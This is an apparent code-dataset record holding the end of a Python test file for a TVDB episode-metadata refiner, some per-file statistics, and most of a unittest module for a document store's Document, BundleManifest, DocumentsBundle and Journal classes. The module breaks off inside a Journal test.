@vcr.use_cassette
def test_refine_ambiguous(episodes):
    # Series name matching more than one TVDB entry ("Colony").
    video = episodes['colony_s01e09']
    episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id


@pytest.mark.integration
@vcr.use_cassette
def test_refine_ambiguous_2(episodes):
    # Another ambiguous series name ("The 100").
    video = episodes['the_100_s03e09']
    episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id


@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_year(episodes):
    # The year disambiguates a remake from the original series.
    video = episodes['dallas_2012_s01e03']
    episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode, year=video.year,
                      original_series=video.original_series)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id


@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_no_year(episodes):
    # Without a year, the refiner must still pick the right series.
    video = episodes['dallas_s01e03']
    episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id


@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_alternative_series(episodes):
    # A series known under alternative names; refiner fills them in.
    video = episodes['turn_s04e03']
    episode = Episode(video.name.lower(), video.series.lower(), video.season, video.episode)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id
    assert episode.alternative_series == video.alternative_series


@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_with_comma(episodes):
    # Series title containing a comma; Episode is parsed from the file name.
    video = episodes['alex_inc_s01e04']
    episode = Episode.fromname(video.name)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id
    assert episode.alternative_series == video.alternative_series


@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_with_country(episodes):
    # Series disambiguated by country suffix ("Shameless (US)").
    video = episodes['shameless_us_s08e01']
    episode = Episode.fromname(video.name)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id
    assert episode.alternative_series == video.alternative_series


@pytest.mark.integration
@vcr.use_cassette
def test_refine_episode_with_country_hoc_us(episodes):
    # Country-suffixed series ("House of Cards (US)").
    video = episodes['house_of_cards_us_s06e01']
    episode = Episode.fromname(video.name)
    refine(episode)
    assert episode.series == video.series
    assert episode.year == video.year
    assert episode.original_series == video.original_series
    assert episode.title == video.title
    assert episode.imdb_id == video.imdb_id
    assert episode.series_imdb_id == video.series_imdb_id
    assert episode.tvdb_id == video.tvdb_id
    assert episode.series_tvdb_id == video.series_tvdb_id
    assert episode.alternative_series == video.alternative_series
| 33.206983
| 109
| 0.740012
| 1,782
| 13,316
| 5.302469
| 0.10101
| 0.115568
| 0.053974
| 0.071119
| 0.813102
| 0.779765
| 0.746957
| 0.724839
| 0.684094
| 0.659752
| 0
| 0.019244
| 0.149294
| 13,316
| 400
| 110
| 33.29
| 0.814883
| 0.001577
| 0
| 0.60559
| 0
| 0
| 0.067028
| 0.001805
| 0
| 0
| 0
| 0
| 0.453416
| 1
| 0.114907
| false
| 0
| 0.02795
| 0.003106
| 0.145963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e8ef768e8dc5385677795f0f90f8794cf078f678
| 29,444
|
py
|
Python
|
tests/test_domain.py
|
robertatakenaka/document-store
|
0598394131ae8db03c28d98babaff201299de49b
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_domain.py
|
robertatakenaka/document-store
|
0598394131ae8db03c28d98babaff201299de49b
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_domain.py
|
robertatakenaka/document-store
|
0598394131ae8db03c28d98babaff201299de49b
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from unittest import mock
import functools
from copy import deepcopy
import datetime
from documentstore import domain, exceptions
# Canonical document manifest shared by the tests below: two XML data
# versions.  The first version's single asset was registered twice (two
# timestamped URL entries), so "latest asset" resolution can be exercised.
SAMPLE_MANIFEST = {
    "id": "0034-8910-rsp-48-2-0275",
    "versions": [
        {
            "data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
            "assets": {
                "0034-8910-rsp-48-2-0275-gf01.gif": [
                    (
                        "2018-08-05T23:03:44.971230Z",
                        "/rawfiles/8e644999a8fa4/0034-8910-rsp-48-2-0275-gf01.gif",
                    ),
                    (
                        "2018-08-05T23:08:41.590174Z",
                        "/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif",
                    ),
                ]
            },
            "timestamp": "2018-08-05T23:02:29.392990Z",
        },
        {
            "data": "/rawfiles/2d3ad9c6bc656/0034-8910-rsp-48-2-0275.xml",
            "assets": {
                "0034-8910-rsp-48-2-0275-gf01.gif": [
                    (
                        "2018-08-05T23:30:29.392995Z",
                        "/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif",
                    )
                ]
            },
            "timestamp": "2018-08-05T23:30:29.392990Z",
        },
    ],
}
def fake_utcnow():
    """Return a fixed ISO-8601 UTC timestamp.

    Injected through the ``now=`` hooks of ``domain.BundleManifest`` so
    that created/updated fields are deterministic in tests.
    """
    frozen_instant = "2018-08-05T22:33:49.795151Z"
    return frozen_instant
class UnittestMixin:
    """Assertion helpers mixed into the ``unittest.TestCase`` classes below."""

    def _assert_raises_with_message(self, type, message, func, *args):
        """Assert that ``func(*args)`` raises ``type`` with exactly ``message``.

        Exceptions of other types propagate unchanged; a mismatched message
        fails via ``assertEqual``.  When no exception is raised at all the
        test now fails with an explicit ``self.fail`` message (the original
        ``self.assertTrue(False)`` produced an unhelpful "False is not true").
        """
        try:
            func(*args)
        except type as exc:
            self.assertEqual(str(exc), message)
        else:
            self.fail("%s not raised" % getattr(type, "__name__", type))
# Bundle factory with the clock frozen, so `created`/`updated` are predictable.
new_bundle = functools.partial(domain.BundleManifest.new, now=fake_utcnow)
class DocumentTests(unittest.TestCase):
    """Behaviour of ``domain.Document``: manifest handling, versioning and
    point-in-time version resolution."""

    def make_one(self):
        # Fresh Document backed by a private copy of SAMPLE_MANIFEST, so
        # tests can mutate it freely.
        _manifest = deepcopy(SAMPLE_MANIFEST)
        return domain.Document(manifest=_manifest)

    def test_manifest_is_generated_on_init(self):
        # Constructing from an id alone synthesises a manifest dict.
        document = domain.Document(id="0034-8910-rsp-48-2-0275")
        self.assertTrue(isinstance(document.manifest, dict))

    def test_manifest_as_arg_on_init(self):
        # A caller-supplied manifest is kept as-is.
        existing_manifest = {"id": "0034-8910-rsp-48-2-0275", "versions": []}
        document = domain.Document(manifest=existing_manifest)
        self.assertEqual(existing_manifest, document.manifest)

    def test_manifest_with_unknown_schema_is_allowed(self):
        # No schema validation is performed on the manifest.
        existing_manifest = {"versions": []}
        document = domain.Document(manifest=existing_manifest)
        self.assertEqual(existing_manifest, document.manifest)

    def test_missing_id_return_empty_string(self):
        existing_manifest = {"versions": []}
        document = domain.Document(manifest=existing_manifest)
        self.assertEqual(document.id(), "")

    def test_id(self):
        document = domain.Document(id="0034-8910-rsp-48-2-0275")
        self.assertEqual(document.id(), "0034-8910-rsp-48-2-0275")

    def test_new_version_of_data(self):
        # new_version appends a third version to the two in the sample.
        document = self.make_one()
        self.assertEqual(len(document.manifest["versions"]), 2)
        document.new_version(
            "/rawfiles/5e3ad9c6cd6b8/0034-8910-rsp-48-2-0275.xml",
            assets_getter=lambda data_url, timeout: (None, []),
        )
        self.assertEqual(len(document.manifest["versions"]), 3)

    def test_get_latest_version(self):
        # version() with no argument returns the most recent entry.
        document = self.make_one()
        latest = document.version()
        self.assertEqual(
            latest["data"], "/rawfiles/2d3ad9c6bc656/0034-8910-rsp-48-2-0275.xml"
        )

    def test_get_latest_version_when_there_isnt_any(self):
        document = domain.Document(id="0034-8910-rsp-48-2-0275")
        self.assertRaises(ValueError, lambda: document.version())

    def test_get_oldest_version(self):
        # version(0) indexes from the oldest entry.
        document = self.make_one()
        oldest = document.version(0)
        self.assertEqual(
            oldest["data"], "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml"
        )

    def test_version_only_shows_newest_assets(self):
        # Of the two registered asset URLs, only the newest is exposed.
        document = self.make_one()
        oldest = document.version(0)
        expected = {
            "data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
            "assets": {
                "0034-8910-rsp-48-2-0275-gf01.gif": "/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif"
            },
            "timestamp": "2018-08-05T23:02:29.392990Z",
        }
        self.assertEqual(oldest, expected)

    def test_new_version_automaticaly_references_latest_known_assets(self):
        # A new version with an asset whose URL is None inherits the latest
        # known URL for that asset from the previous version.
        manifest = {
            "id": "0034-8910-rsp-48-2-0275",
            "versions": [
                {
                    "data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
                    "assets": {
                        "0034-8910-rsp-48-2-0275-gf01.gif": [
                            (
                                "2018-08-05T23:03:44.971230Z",
                                "/rawfiles/8e644999a8fa4/0034-8910-rsp-48-2-0275-gf01.gif",
                            ),
                            (
                                "2018-08-05T23:03:49.971250Z",
                                "/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif",
                            ),
                        ]
                    },
                }
            ],
        }
        document = domain.Document(manifest=manifest)
        document.new_version(
            "/rawfiles/2d3ad9c6bc656/0034-8910-rsp-48-2-0275.xml",
            assets_getter=lambda data_url, timeout: (
                None,
                [("0034-8910-rsp-48-2-0275-gf01.gif", None)],
            ),
        )
        latest = document.version()
        self.assertEqual(
            latest["assets"]["0034-8910-rsp-48-2-0275-gf01.gif"],
            "/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif",
        )

    def test_version_at_later_time(self):
        """
        In the `SAMPLE_MANIFEST` manifest, the most recent version was
        produced at the following instants: a) the data at
        2018-08-05 23:30:29.392990 and b) the digital asset at
        2018-08-05 23:30:29.392995.
        """
        document = self.make_one()
        target = document.version_at("2018-12-31")
        expected = {
            "data": "/rawfiles/2d3ad9c6bc656/0034-8910-rsp-48-2-0275.xml",
            "assets": {
                "0034-8910-rsp-48-2-0275-gf01.gif": "/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif"
            },
            "timestamp": "2018-08-05T23:30:29.392990Z",
        }
        self.assertEqual(target, expected)

    def test_version_at_given_time(self):
        # A timestamp between the two versions resolves to the first one,
        # with the asset URL known at that instant.
        document = self.make_one()
        target = document.version_at("2018-08-05T23:04:00Z")
        expected = {
            "data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
            "assets": {
                "0034-8910-rsp-48-2-0275-gf01.gif": "/rawfiles/8e644999a8fa4/0034-8910-rsp-48-2-0275-gf01.gif"
            },
            "timestamp": "2018-08-05T23:02:29.392990Z",
        }
        self.assertEqual(target, expected)

    def test_version_at_time_between_data_and_asset_registration(self):
        # Before the asset was first registered, its URL is empty.
        document = self.make_one()
        target = document.version_at("2018-08-05T23:03:43Z")
        expected = {
            "data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
            "assets": {"0034-8910-rsp-48-2-0275-gf01.gif": ""},
            "timestamp": "2018-08-05T23:02:29.392990Z",
        }
        self.assertEqual(target, expected)

    def test_version_at_time_prior_to_data_registration(self):
        # No version existed yet at that instant.
        document = self.make_one()
        self.assertRaises(ValueError, lambda: document.version_at("2018-07-01"))

    def test_version_at_non_UCT_time_raises_exception(self):
        # Timestamps must be UTC ("Z"-suffixed / ISO); others are rejected.
        document = self.make_one()
        self.assertRaises(
            ValueError, lambda: document.version_at("2018-08-05 23:03:44")
        )
class BundleManifestTest(UnittestMixin, unittest.TestCase):
def test_new(self):
fake_date = fake_utcnow()
expected = {
"id": "0034-8910-rsp-48-2",
"created": fake_date,
"updated": fake_date,
"items": [],
"metadata": {},
}
self.assertEqual(new_bundle("0034-8910-rsp-48-2"), expected)
def test_new_set_same_value_to_created_updated(self):
documents_bundle = domain.BundleManifest.new("0034-8910-rsp-48-2")
self.assertEqual(documents_bundle["created"], documents_bundle["updated"])
def test_set_metadata(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2018", now=fake_utcnow
)
self.assertEqual(
documents_bundle["metadata"]["publication_year"], [(fake_utcnow(), "2018")]
)
def test_set_metadata_updates_last_modification_date(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
current_updated = documents_bundle["updated"]
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2018"
)
self.assertTrue(current_updated < documents_bundle["updated"])
def test_set_metadata_doesnt_overwrite_existing_values(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle,
"publication_year",
"2018",
now=lambda: "2018-08-05T22:33:49.795151Z",
)
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle,
"publication_year",
"2019",
now=lambda: "2018-08-05T22:34:07.795151Z",
)
self.assertEqual(
documents_bundle["metadata"]["publication_year"],
[
("2018-08-05T22:33:49.795151Z", "2018"),
("2018-08-05T22:34:07.795151Z", "2019"),
],
)
self.assertEqual(len(documents_bundle["metadata"]), 1)
def test_set_metadata_to_preexisting_set(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle,
"publication_year",
"2018",
now=lambda: "2018-08-05T22:33:49.795151Z",
)
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "volume", "25", now=lambda: "2018-08-05T22:34:07.795151Z"
)
self.assertEqual(
documents_bundle["metadata"]["publication_year"],
[("2018-08-05T22:33:49.795151Z", "2018")],
)
self.assertEqual(
documents_bundle["metadata"]["volume"],
[("2018-08-05T22:34:07.795151Z", "25")],
)
self.assertEqual(len(documents_bundle["metadata"]), 2)
def test_get_metadata(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2018"
)
self.assertEqual(
domain.BundleManifest.get_metadata(documents_bundle, "publication_year"),
"2018",
)
def test_get_metadata_always_returns_latest(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2018"
)
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2019"
)
self.assertEqual(
domain.BundleManifest.get_metadata(documents_bundle, "publication_year"),
"2019",
)
def test_get_metadata_defaults_to_empty_str_when_missing(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
self.assertEqual(
domain.BundleManifest.get_metadata(documents_bundle, "publication_year"), ""
)
def test_get_metadata_with_user_defined_default(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
self.assertEqual(
domain.BundleManifest.get_metadata(
documents_bundle, "publication_year", default="2019"
),
"2019",
)
def test_add_item(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
current_updated = documents_bundle["updated"]
documents_bundle = domain.BundleManifest.add_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0275"
)
self.assertEqual(
documents_bundle["items"][-1], "/documents/0034-8910-rsp-48-2-0275"
)
self.assertTrue(current_updated < documents_bundle["updated"])
def test_add_item_raises_exception_if_item_already_exists(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.add_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0275"
)
current_updated = documents_bundle["updated"]
current_item_len = len(documents_bundle["items"])
self._assert_raises_with_message(
exceptions.AlreadyExists,
'cannot add item "/documents/0034-8910-rsp-48-2-0275" in bundle: '
"the item already exists",
domain.BundleManifest.add_item,
documents_bundle,
"/documents/0034-8910-rsp-48-2-0275",
)
self.assertEqual(current_updated, documents_bundle["updated"])
self.assertEqual(current_item_len, len(documents_bundle["items"]))
def test_insert_item(self):
    """insert_item places the item at the given index and bumps "updated"."""
    bundle = new_bundle("0034-8910-rsp-48-2")
    updated_before = bundle["updated"]
    bundle = domain.BundleManifest.add_item(
        bundle, "/documents/0034-8910-rsp-48-2-0775"
    )
    bundle = domain.BundleManifest.insert_item(
        bundle, 0, "/documents/0034-8910-rsp-48-2-0275"
    )
    self.assertEqual(bundle["items"][0], "/documents/0034-8910-rsp-48-2-0275")
    self.assertEqual(bundle["items"][1], "/documents/0034-8910-rsp-48-2-0775")
    self.assertLess(updated_before, bundle["updated"])
def test_insert_item_raises_exception_if_item_already_exists(self):
    """Inserting a duplicate item fails and leaves the manifest untouched."""
    item_id = "/documents/0034-8910-rsp-48-2-0775"
    bundle = new_bundle("0034-8910-rsp-48-2")
    bundle = domain.BundleManifest.add_item(bundle, item_id)
    updated_before = bundle["updated"]
    items_before = len(bundle["items"])
    self._assert_raises_with_message(
        exceptions.AlreadyExists,
        'cannot insert item "/documents/0034-8910-rsp-48-2-0775" in bundle: '
        "the item already exists",
        domain.BundleManifest.insert_item,
        bundle,
        0,
        item_id,
    )
    # Neither the timestamp nor the item list may change on failure.
    self.assertEqual(updated_before, bundle["updated"])
    self.assertEqual(items_before, len(bundle["items"]))
def test_insert_item_follows_python_semantics(self):
    """Out-of-range indexes clamp to the ends, like ``list.insert``."""
    bundle = new_bundle("0034-8910-rsp-48-2")
    bundle = domain.BundleManifest.add_item(
        bundle, "/documents/0034-8910-rsp-48-2-0475"
    )
    # A large negative index clamps to the head of the list.
    bundle = domain.BundleManifest.insert_item(
        bundle, -10, "/documents/0034-8910-rsp-48-2-0275"
    )
    self.assertEqual(bundle["items"][0], "/documents/0034-8910-rsp-48-2-0275")
    # A large positive index clamps to the tail.
    bundle = domain.BundleManifest.insert_item(
        bundle, 10, "/documents/0034-8910-rsp-48-2-0975"
    )
    self.assertEqual(bundle["items"][-1], "/documents/0034-8910-rsp-48-2-0975")
def test_remove_item(self):
    """remove_item drops the item and bumps the "updated" timestamp."""
    item_id = "/documents/0034-8910-rsp-48-2-0475"
    bundle = new_bundle("0034-8910-rsp-48-2")
    updated_before = bundle["updated"]
    bundle = domain.BundleManifest.add_item(bundle, item_id)
    bundle = domain.BundleManifest.remove_item(bundle, item_id)
    self.assertNotIn(item_id, bundle["items"])
    self.assertLess(updated_before, bundle["updated"])
def test_remove_item_raises_exception_if_item_does_not_exist(self):
    """Removing an unknown item fails and leaves the manifest untouched."""
    bundle = new_bundle("0034-8910-rsp-48-2")
    updated_before = bundle["updated"]
    items_before = len(bundle["items"])
    self._assert_raises_with_message(
        exceptions.DoesNotExist,
        'cannot remove item "/documents/0034-8910-rsp-48-2-0775" from bundle: '
        "the item does not exist",
        domain.BundleManifest.remove_item,
        bundle,
        "/documents/0034-8910-rsp-48-2-0775",
    )
    # Neither the timestamp nor the item list may change on failure.
    self.assertEqual(updated_before, bundle["updated"])
    self.assertEqual(items_before, len(bundle["items"]))
class DocumentsBundleTest(UnittestMixin, unittest.TestCase):
    """Unit tests for the ``domain.DocumentsBundle`` entity."""

    def setUp(self):
        # Freeze domain.datetime.utcnow() so timestamp-bearing assertions
        # are deterministic.
        datetime_patcher = mock.patch.object(
            domain, "datetime", mock.Mock(wraps=datetime.datetime)
        )
        mocked_datetime = datetime_patcher.start()
        mocked_datetime.utcnow.return_value = datetime.datetime(
            2018, 8, 5, 22, 33, 49, 795151
        )
        self.addCleanup(datetime_patcher.stop)

    def test_manifest_is_generated_on_init(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        self.assertIsInstance(bundle.manifest, dict)

    def test_manifest_as_arg_on_init(self):
        manifest = new_bundle("0034-8910-rsp-48-2")
        bundle = domain.DocumentsBundle(manifest=manifest)
        self.assertEqual(manifest, bundle.manifest)

    def test_manifest_schema_is_not_validated_on_init(self):
        manifest = {"versions": []}
        bundle = domain.DocumentsBundle(manifest=manifest)
        self.assertEqual(manifest, bundle.manifest)

    def test_id_returns_id(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        self.assertEqual(bundle.id(), "0034-8910-rsp-48-2")

    def test_publication_year_is_empty_str(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        self.assertEqual(bundle.publication_year, "")

    def test_set_publication_year(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.publication_year = "2018"
        self.assertEqual(bundle.publication_year, "2018")
        # The manifest keeps a (timestamp, value) history for each field.
        self.assertEqual(
            bundle.manifest["metadata"]["publication_year"],
            [("2018-08-05T22:33:49.795151Z", "2018")],
        )

    def test_set_publication_year_convert_to_str(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.publication_year = 2018
        self.assertEqual(bundle.publication_year, "2018")

    def test_set_publication_year_validates_four_digits_year(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        self._assert_raises_with_message(
            ValueError,
            "cannot set publication_year with value " '"18": the value is not valid',
            setattr,
            bundle,
            "publication_year",
            18,
        )

    def test_volume_is_empty_str(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        self.assertEqual(bundle.volume, "")

    def test_set_volume(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.volume = "25"
        self.assertEqual(bundle.volume, "25")
        self.assertEqual(
            bundle.manifest["metadata"]["volume"],
            [("2018-08-05T22:33:49.795151Z", "25")],
        )

    def test_set_volume_convert_to_str(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.volume = 25
        self.assertEqual(bundle.volume, "25")

    def test_set_volume_content_is_not_validated(self):
        # Unlike publication_year, volume accepts arbitrary strings.
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.volume = "25.A"
        self.assertEqual(bundle.volume, "25.A")

    def test_number_is_empty_str(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        self.assertEqual(bundle.number, "")

    def test_set_number(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.number = "3"
        self.assertEqual(bundle.number, "3")
        self.assertEqual(
            bundle.manifest["metadata"]["number"],
            [("2018-08-05T22:33:49.795151Z", "3")],
        )

    def test_set_number_convert_to_str(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.number = 3
        self.assertEqual(bundle.number, "3")

    def test_set_number_content_is_not_validated(self):
        # Unlike publication_year, number accepts arbitrary strings.
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.number = "3.A"
        self.assertEqual(bundle.number, "3.A")

    def test_supplement_is_empty_str(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        self.assertEqual(bundle.supplement, "")

    def test_set_supplement(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.supplement = "3"
        self.assertEqual(bundle.supplement, "3")
        self.assertEqual(
            bundle.manifest["metadata"]["supplement"],
            [("2018-08-05T22:33:49.795151Z", "3")],
        )

    def test_set_supplement_convert_to_str(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.supplement = 3
        self.assertEqual(bundle.supplement, "3")

    def test_add_document(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
        self.assertIn("/documents/0034-8910-rsp-48-2-0275", bundle.manifest["items"])

    def test_add_document_raises_exception_if_item_already_exists(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
        self._assert_raises_with_message(
            exceptions.AlreadyExists,
            'cannot add item "/documents/0034-8910-rsp-48-2-0275" in bundle: '
            "the item already exists",
            bundle.add_document,
            "/documents/0034-8910-rsp-48-2-0275",
        )

    def test_documents_returns_empty_list(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        self.assertEqual(bundle.documents, [])

    def test_documents_returns_added_documents_list(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        doc_ids = [
            "/documents/0034-8910-rsp-48-2-0275",
            "/documents/0034-8910-rsp-48-2-0276",
            "/documents/0034-8910-rsp-48-2-0277",
        ]
        for doc_id in doc_ids:
            bundle.add_document(doc_id)
        # Insertion order must be preserved.
        self.assertEqual(bundle.documents, doc_ids)

    def test_remove_document(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        for doc_id in (
            "/documents/0034-8910-rsp-48-2-0275",
            "/documents/0034-8910-rsp-48-2-0276",
            "/documents/0034-8910-rsp-48-2-0277",
        ):
            bundle.add_document(doc_id)
        bundle.remove_document("/documents/0034-8910-rsp-48-2-0275")
        self.assertNotIn(
            "/documents/0034-8910-rsp-48-2-0275", bundle.manifest["items"]
        )
        self.assertEqual(2, len(bundle.manifest["items"]))

    def test_remove_document_raises_exception_if_item_does_not_exist(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.add_document("/documents/0034-8910-rsp-48-2-0276")
        bundle.add_document("/documents/0034-8910-rsp-48-2-0277")
        self._assert_raises_with_message(
            exceptions.DoesNotExist,
            'cannot remove item "/documents/0034-8910-rsp-48-2-0275" from bundle: '
            "the item does not exist",
            bundle.remove_document,
            "/documents/0034-8910-rsp-48-2-0275",
        )

    def test_insert_document(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        for doc_id in (
            "/documents/0034-8910-rsp-48-2-0275",
            "/documents/0034-8910-rsp-48-2-0276",
            "/documents/0034-8910-rsp-48-2-0277",
        ):
            bundle.add_document(doc_id)
        bundle.insert_document(1, "/documents/0034-8910-rsp-48-2-0271")
        self.assertEqual(
            "/documents/0034-8910-rsp-48-2-0271", bundle.manifest["items"][1]
        )
        self.assertEqual(4, len(bundle.manifest["items"]))

    def test_insert_document_raises_exception_if_item_already_exists(self):
        bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
        bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
        self._assert_raises_with_message(
            exceptions.AlreadyExists,
            'cannot insert item "/documents/0034-8910-rsp-48-2-0275" in bundle: '
            "the item already exists",
            bundle.insert_document,
            1,
            "/documents/0034-8910-rsp-48-2-0275",
        )
class JournalTest(UnittestMixin, unittest.TestCase):
    """Unit tests for the ``domain.Journal`` entity."""

    # Multilingual mission fixture shared by the mission tests.
    MISSION = {
        "pt": "Publicar trabalhos científicos originais sobre a Amazonia.",
        "es": "Publicar trabajos científicos originales sobre Amazonia.",
        "en": "To publish original scientific papers about Amazonia.",
    }

    def setUp(self):
        # Freeze domain.datetime.utcnow() so timestamp-bearing assertions
        # are deterministic.
        datetime_patcher = mock.patch.object(
            domain, "datetime", mock.Mock(wraps=datetime.datetime)
        )
        mocked_datetime = datetime_patcher.start()
        mocked_datetime.utcnow.return_value = datetime.datetime(
            2018, 8, 5, 22, 33, 49, 795151
        )
        self.addCleanup(datetime_patcher.stop)

    def test_manifest_is_generated_on_init(self):
        journal = domain.Journal(id="0034-8910-rsp-48-2")
        self.assertIsInstance(journal.manifest, dict)

    def test_manifest_as_arg_on_init(self):
        existing_manifest = new_bundle("0034-8910-rsp-48-2")
        journal = domain.Journal(manifest=existing_manifest)
        self.assertEqual(existing_manifest, journal.manifest)

    def test_manifest_schema_is_not_validated_on_init(self):
        existing_manifest = {"versions": []}
        journal = domain.Journal(manifest=existing_manifest)
        self.assertEqual(existing_manifest, journal.manifest)

    def test_id_returns_id(self):
        journal = domain.Journal(id="0034-8910-rsp-48-2")
        self.assertEqual(journal.id(), "0034-8910-rsp-48-2")

    def test_set_mission(self):
        journal = domain.Journal(id="0034-8910-rsp-48-2")
        # Assign a copy so the equality assertions below cannot be satisfied
        # by object identity alone.
